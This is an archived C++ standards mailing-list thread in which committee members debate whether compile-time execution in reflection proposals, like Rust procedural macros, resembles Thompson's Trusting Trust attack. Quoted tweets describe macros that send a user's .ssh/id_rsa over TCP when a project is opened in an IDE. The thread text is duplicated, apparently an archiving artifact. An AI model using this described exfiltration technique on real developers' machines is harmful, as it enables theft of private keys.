Date: Sat, 15 May 2021 16:55:46 -0700
I think I understand what you’re saying... and yes I agree that reflection
should not do arbitrary stuff at compile time.
That said, today’s compilers are already not implemented to recent this
type of attack at all. You can exploit a compiler way easier than say a web
browser. Reflection won’t open a Pandora box all of a sudden... but we
should still design it in a way that’s bounded 🙂
On Sat, May 15, 2021 at 4:49 PM Herb Sutter <hsutter_at_[hidden]> wrote:
> I should tease apart two things:
>
>
>
> Yes, the general issue is the ability to link and run arbitrary libs at
> compile time. That’s the main point below, a concern we had that appears to
> be arising in the wild for languages that went down that path.
>
>
>
> But, secondarily, I thought it’s also related to the narrower issue of
> Trusting Trust attacks because Thompson’s initial approach required a
> specially-crafted compiler binary that already carried the malicious code,
> whereas the ability to execute arbitrary libraries at compile time (esp.
> malicious ones that can do introspection) could give a new vector to inject
> Trusting Trust attacks… the compiler can be totally pristine, but comes
> with a launchpad to let you provide the malicious code later. No?
>
>
>
>
>
>
>
> *From:* JF Bastien <cxx_at_[hidden]>
> *Sent:* Saturday, May 15, 2021 3:34 PM
> *To:* sg7_at_[hidden]
> *Cc:* Hana Dusíková <hanicka_at_[hidden]>; Chandler Carruth <
> chandlerc_at_[hidden]>; Herb Sutter <hsutter_at_[hidden]>
> *Subject:* Re: [SG7] Thompson Turing lecture
>
>
>
> It's not really the same issue: trusting trust is about the compiler
> changing the code it's compiling (including changing a compiler it's
> compiling to continue having this behavior), whereas the Rust thing is that
> macros can execute arbitrary Rust including networking code. The Rust
> problem is equivalent to putting arbitrary code in your makefile. It's
> something that you could sandbox and disallow (say, by running the compiler
> in a container). Whereas trusting trust is very hard to detect because the
> compiler's output binary is what's been compromised and you can't easily
> tell.
>
>
>
> On Sat, May 15, 2021 at 3:24 PM Herb Sutter via SG7 <sg7_at_[hidden]>
> wrote:
>
> Below, I emailed the “Trusting Trust” reference during our SG7 session on
> Circle in Prague, because SG7 was in the middle of discussing concerns
> about Circle’s approach of linking arbitrary libraries and executing them
> at compile time.
>
>
>
> Since yesterday, I noticed the following tweets about Rust…
>
>
>
> Tony “Abolish ICE” Arcieri 🦀 on Twitter: "Exfiltrating secrets with
> @rustlang macros: leveraging macro expansion in IDEs to exfiltrate secrets
> without compiling the code or even opening a file https://t.co/M2qhsfaLdX"
> / Twitter
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fbascule%2Fstatus%2F1393228285056741376&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365841167%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=G267zWwO9AX%2F3O0NRhQiGMIJJ8CD2A66ksYKok9as0I%3D&reserved=0>
>
>
>
> Ralf (RPW) on Twitter: "„Open innocent_app in VSCode*, and the contents of
> your .ssh/id_rsa file will be sent over TCP to localhost:8080. You don't
> even need to open any files in the project!“ https://t.co/eKx2CWrirD" /
> Twitter
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fesizkur%2Fstatus%2F1393477018474459137&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365851162%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=8WgNZXJKVCoFeUgU4lOGmrSRN%2FEJwDnIvy5BptZkOyo%3D&reserved=0>
>
>
>
> Björk on Twitter: "@hankadusikova ... Wait, what? You can do compile-time
> I/O (networking) in Rust, or is this because of plugins executing arbitrary
> code? https://t.co/soA3bD9vT2" / Twitter
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2F__phantomderp%2Fstatus%2F1393553321177321473&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365861161%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=JYRYlAxAlIj874btarG5yVdqa4WwFanyYIqCeJ%2FP9hU%3D&reserved=0>
>
>
>
> David "Bear Feeder" Pollak🐈 on Twitter: "Oh crap! This will be 2021’s
> side channel attack… guess we have to run our compilers in containers with
> no network access…" / Twitter
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fdpp%2Fstatus%2F1393614418269802501&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365871158%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=FN7TEy1emthwaJa4IX4NwgKa8LyGdcx1%2BtJ7tL34GK0%3D&reserved=0>
>
>
>
> This sounds a lot like the same issue… is it?
>
>
>
> (Ah, I just saw Hana’s tweet
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fhankadusikova%2Fstatus%2F1393532440120074243%3Fs%3D20&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365881150%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=B5%2F3HwNOjk10s1UcxOJ7N6k0qpbCU1ldT4Qhthpxj%2BM%3D&reserved=0>
> before hitting Send – yup, sounds like it is the same issue, thank you
> Hana.)
>
>
>
>
>
>
>
> *From:* Herb Sutter
> *Sent:* Thursday, February 13, 2020 7:59 AM
> *To:* sg7_at_[hidden]
> *Subject:* Thompson Turing lecture
>
>
>
>
> https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_ReflectionsonTrustingTrust.pdf
> <https://nam06.safelinks.protection.outlook.com/?url=https:%2F%2Fwww.cs.cmu.edu%2F~rdriley%2F487%2Fpapers%2FThompson_1984_ReflectionsonTrustingTrust.pdf&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365881150%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=qWJ5TJJ1LacYSAnZqFU6fiulR6iyb5CNlMF1skn72Vo%3D&reserved=0>
>
>
>
> As we we think about extensible compilers and JITs, this is a classic
> paper worth remembering about supply chain issues with just ordinary closed
> compilers.
>
>
>
> Herb
>
>
>
> --
> SG7 mailing list
> SG7_at_[hidden]
> https://lists.isocpp.org/mailman/listinfo.cgi/sg7
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Flists.isocpp.org%2Fmailman%2Flistinfo.cgi%2Fsg7&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365891145%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=3ZKbFwRpHiQ3981DPNxSVWXndKEKo8Xj%2BB6FzcbLuj4%3D&reserved=0>
>
>
should not do arbitrary stuff at compile time.
That said, today’s compilers are already not implemented to recent this
type of attack at all. You can exploit a compiler way easier than say a web
browser. Reflection won’t open a Pandora box all of a sudden... but we
should still design it in a way that’s bounded 🙂
On Sat, May 15, 2021 at 4:49 PM Herb Sutter <hsutter_at_[hidden]> wrote:
> I should tease apart two things:
>
>
>
> Yes, the general issue is the ability to link and run arbitrary libs at
> compile time. That’s the main point below, a concern we had that appears to
> be arising in the wild for languages that went down that path.
>
>
>
> But, secondarily, I thought it’s also related to the narrower issue of
> Trusting Trust attacks because Thompson’s initial approach required a
> specially-crafted compiler binary that already carried the malicious code,
> whereas the ability to execute arbitrary libraries at compile time (esp.
> malicious ones that can do introspection) could give a new vector to inject
> Trusting Trust attacks… the compiler can be totally pristine, but comes
> with a launchpad to let you provide the malicious code later. No?
>
>
>
>
>
>
>
> *From:* JF Bastien <cxx_at_[hidden]>
> *Sent:* Saturday, May 15, 2021 3:34 PM
> *To:* sg7_at_[hidden]
> *Cc:* Hana Dusíková <hanicka_at_[hidden]>; Chandler Carruth <
> chandlerc_at_[hidden]>; Herb Sutter <hsutter_at_[hidden]>
> *Subject:* Re: [SG7] Thompson Turing lecture
>
>
>
> It's not really the same issue: trusting trust is about the compiler
> changing the code it's compiling (including changing a compiler it's
> compiling to continue having this behavior), whereas the Rust thing is that
> macros can execute arbitrary Rust including networking code. The Rust
> problem is equivalent to putting arbitrary code in your makefile. It's
> something that you could sandbox and disallow (say, by running the compiler
> in a container). Whereas trusting trust is very hard to detect because the
> compiler's output binary is what's been compromised and you can't easily
> tell.
>
>
>
> On Sat, May 15, 2021 at 3:24 PM Herb Sutter via SG7 <sg7_at_[hidden]>
> wrote:
>
> Below, I emailed the “Trusting Trust” reference during our SG7 session on
> Circle in Prague, because SG7 was in the middle of discussing concerns
> about Circle’s approach of linking arbitrary libraries and executing them
> at compile time.
>
>
>
> Since yesterday, I noticed the following tweets about Rust…
>
>
>
> Tony “Abolish ICE” Arcieri 🦀 on Twitter: "Exfiltrating secrets with
> @rustlang macros: leveraging macro expansion in IDEs to exfiltrate secrets
> without compiling the code or even opening a file https://t.co/M2qhsfaLdX"
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fbascule%2Fstatus%2F1393228285056741376&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365841167%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=G267zWwO9AX%2F3O0NRhQiGMIJJ8CD2A66ksYKok9as0I%3D&reserved=0>
>
>
>
> Ralf (RPW) on Twitter: "„Open innocent_app in VSCode*, and the contents of
> your .ssh/id_rsa file will be sent over TCP to localhost:8080. You don't
> even need to open any files in the project!“ https://t.co/eKx2CWrirD" /
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fesizkur%2Fstatus%2F1393477018474459137&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365851162%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=8WgNZXJKVCoFeUgU4lOGmrSRN%2FEJwDnIvy5BptZkOyo%3D&reserved=0>
>
>
>
> Björk on Twitter: "@hankadusikova ... Wait, what? You can do compile-time
> I/O (networking) in Rust, or is this because of plugins executing arbitrary
> code? https://t.co/soA3bD9vT2" / Twitter
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2F__phantomderp%2Fstatus%2F1393553321177321473&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365861161%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=JYRYlAxAlIj874btarG5yVdqa4WwFanyYIqCeJ%2FP9hU%3D&reserved=0>
>
>
>
> David "Bear Feeder" Pollak🐈 on Twitter: "Oh crap! This will be 2021’s
> side channel attack… guess we have to run our compilers in containers with
> no network access…" / Twitter
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fdpp%2Fstatus%2F1393614418269802501&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365871158%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=FN7TEy1emthwaJa4IX4NwgKa8LyGdcx1%2BtJ7tL34GK0%3D&reserved=0>
>
>
>
> This sounds a lot like the same issue… is it?
>
>
>
> (Ah, I just saw Hana’s tweet
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftwitter.com%2Fhankadusikova%2Fstatus%2F1393532440120074243%3Fs%3D20&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365881150%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=B5%2F3HwNOjk10s1UcxOJ7N6k0qpbCU1ldT4Qhthpxj%2BM%3D&reserved=0>
> before hitting Send – yup, sounds like it is the same issue, thank you
> Hana.)
>
>
>
>
>
>
>
> *From:* Herb Sutter
> *Sent:* Thursday, February 13, 2020 7:59 AM
> *To:* sg7_at_[hidden]
> *Subject:* Thompson Turing lecture
>
>
>
>
> https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_ReflectionsonTrustingTrust.pdf
> <https://nam06.safelinks.protection.outlook.com/?url=https:%2F%2Fwww.cs.cmu.edu%2F~rdriley%2F487%2Fpapers%2FThompson_1984_ReflectionsonTrustingTrust.pdf&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365881150%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=qWJ5TJJ1LacYSAnZqFU6fiulR6iyb5CNlMF1skn72Vo%3D&reserved=0>
>
>
>
> As we we think about extensible compilers and JITs, this is a classic
> paper worth remembering about supply chain issues with just ordinary closed
> compilers.
>
>
>
> Herb
>
>
>
> --
> SG7 mailing list
> SG7_at_[hidden]
> https://lists.isocpp.org/mailman/listinfo.cgi/sg7
> <https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Flists.isocpp.org%2Fmailman%2Flistinfo.cgi%2Fsg7&data=04%7C01%7Chsutter%40microsoft.com%7C961ce426a36a4eaf8e9908d917f185a0%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637567148365891145%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000&sdata=3ZKbFwRpHiQ3981DPNxSVWXndKEKo8Xj%2BB6FzcbLuj4%3D&reserved=0>
>
>
Received on 2021-05-15 18:56:00